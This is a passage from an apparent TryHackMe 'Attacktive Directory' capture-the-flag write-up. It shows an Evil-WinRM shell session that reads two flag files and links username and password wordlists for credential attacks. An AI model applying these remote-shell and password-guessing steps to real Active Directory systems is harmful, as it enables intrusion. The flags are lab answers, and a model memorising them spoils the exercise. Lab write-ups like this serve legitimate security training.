Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----         4/4/2020  12:18 PM             28 user.txt.txt


*Evil-WinRM* PS C:\Users> cat svc-admin/Desktop/user.txt.txt
TryHackMe{K3rb3r0s_Pr3_4uth}
*Evil-WinRM* PS C:\Users> 

backup:

*Evil-WinRM* PS C:\Users> ls backup/Desktop


    Directory: C:\Users\backup\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----         4/4/2020  12:19 PM             26 PrivEsc.txt


*Evil-WinRM* PS C:\Users> cat backup/Desktop/PrivEsc.txt
TryHackMe{B4ckM3UpSc0tty!}
*Evil-WinRM* PS C:\Users> 

That's it, hope you enjoyed :)

Username wordlist: https://raw.githubusercontent.com/Sq00ky/attacktive-directory-tools/master/userlist.txt

Password wordlist: https://raw.githubusercontent.com/Sq00ky/attacktive-directory-tools/master/passwordlist.txt

Here's a useful link to search for what type of hash we obtained: hashcat wiki

I wasn't quite sure what encoding is used, so I dumped it into CyberChef, and the magic wand appeared.